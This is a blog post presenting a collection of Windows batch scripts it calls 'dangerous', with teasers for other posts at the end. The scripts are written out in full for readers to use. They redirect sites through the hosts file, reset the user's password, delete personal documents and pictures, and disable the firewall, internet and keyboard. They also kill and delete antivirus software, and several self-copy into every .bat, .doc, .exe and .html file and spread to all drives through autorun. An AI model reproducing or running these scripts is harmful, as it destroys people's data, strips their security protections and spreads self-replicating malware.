Skip to main content

Some Of the most Dangerous .bat files which blocks even Google.

Some Of the most Dangerous .bat files which blocks even Google.
zwani.com myspace graphic comments
Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.
Block Google.
Code:
@echo off
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"
::---------------------------::
Block Hotmail.
Code:
@echo off
::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::
Block MSN.
Code:
@echo off
::---------Block MSN---------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 http://www.msn.com >> "Hosts"
::---------------------------::
Block wikipedia.
Code:
@echo off
::-------Block Wikipedia-----::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 wikipedia.org >> "Hosts"
echo 127.0.0.1 http://www.wikipedia.org >> "Hosts"
::---------------------------::
Change time to 00:00.
Code:
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::
Change user pass.
Code:
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::
Create account OWNED.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
Delete al docs.
Code:
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
Delete all music.
Code:
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
Delete all pics.
Code:
@echo off
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::
Disable Firewall.
Code:
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
[color=#FF0000]Disable Internet.
Code:
@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::
Disable Keyboard.
Code:
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
Infect all Bat.
Code:
@echo off
::----Infect All Bat Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.bat) Do (
Set BatInfect=%%Z > Nul
Copy /y %0 %BatInfect%
)
)


Del /f /s /q DirPath
::---------------------------::
Infect all docs.
Code:
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.doc) Do (
Set DocInfect=%%Z > Nul
Copy /y %0 %DocInfect%
)
)


Del /f /s /q DirPath
::---------------------------::
Infect all Drivers.
Code:
@echo off

::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
Infect all .exe files.
Code:
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)


Del /f /s /q DirPath
::---------------------------::
Open disk.
Code:
@echo off
::-------Open Disk Tray------::
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
::---------------------------::
Spam /C Drive.
Code:
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::
Kill Anti-virus.
Code:
@echo off

::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
::---------------------------::
Infect all HTML.
Code:
@echo off
::--Infect All Html Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set HtmlInfect=%%Z > Nul
Copy /y %0 %HtmlInfect%
)
)


Del /f /s /q DirPath
::---------------------------::
Hide MUSIC folder.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
Startup XP song
Code:
@echo off
::--Start Hidden WinXP Song--::
cd "C:\Windows\system32\oobe\images"
start title.wma
::---------------------------::
Infect CMD.
Code:
@echo off
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------::


If you have any Questions about this following article. Please Comment below in Comment Box.


Posted by Nagesh ;)


Comments

Popular posts from this blog

How to remove the WannaCry & Wana Decryptor Ransomware.

How to remove the WannaCry & Wana Decryptor Ransomware Table of Contents 1 Who is this guide for? 2 What is WannaCry, WannaCryptor, WNCRY, or Wana Decryptor? 3 How to remove the WannaCry and Wana Decryptor Ransomware 4 Is it possible to recover WNCRY files that have been encrypted by WannaCry for Free? 5 How to Protect yourself from the WannaCry or Wana Decryptor Ransomware. Who is this guide for? If a user is infected with the WanaCrypt0r/Wana Decryptor Ransomware then it is important that they remove it immediately. This is because even if you are not going to pay the ransom, while the ransomware is running it will continue to encrypt new files as they are created. This guide will guide victims on how they can remove the WannaCry and Wana Decryptor 2.0 infection from their computer. This guide, though, will not allow you to decrypt your files for free. This is currently impossible. I will provide steps that you can use to possibly recover files (slim chanc

Collection of Windows 10 Hidden Secret Registry Tweaks

Collection of Windows 10 Hidden Secret Registry Tweaks We know that Microsoft is working on the upcoming operating system  Windows 10  and currently a  free Technical Preview  build is available for download to public so that we all can test its new features and can provide feedback and suggestions to Microsoft. Since Windows 10 is under development and testing, there are many new experimental features which are put into the OS but are not activated because these features might not be complete and can cause problems to users. On the other hand, some new features are enabled to replace old features but Microsoft also keeps the old features in the OS hidden from users. Most of the times these new and old features can be enabled or disabled using various Registry tweaks which are applied using our favorite Registry Editor tool. We have received many emails and comments from our readers who shared various Registry tweaks to enable new hidden secret experimental features in Wind

Top 10 Secret Tricks in Google.

In This Cool Video i will be Telling you Google Most secret Tricks in Top 10.. Telugu Click this Link if the video is not Working. https://youtu.be/tX7X-OsP6Hs Posted by Nagesh ;)